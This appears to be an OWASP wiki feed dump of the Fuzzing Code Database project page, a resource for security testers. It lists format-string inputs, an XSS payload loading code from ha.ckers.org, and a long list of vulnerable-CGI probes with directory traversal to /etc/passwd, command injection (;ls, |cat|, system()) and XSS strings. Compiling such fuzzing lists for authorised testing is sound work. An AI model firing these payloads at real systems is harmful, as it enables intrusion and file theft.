&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80087</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80087"/>
				<updated>2010-03-17T22:29:27Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''' &lt;br /&gt;
&lt;br /&gt;
*---------------&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''' &lt;br /&gt;
&lt;br /&gt;
*---------------&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
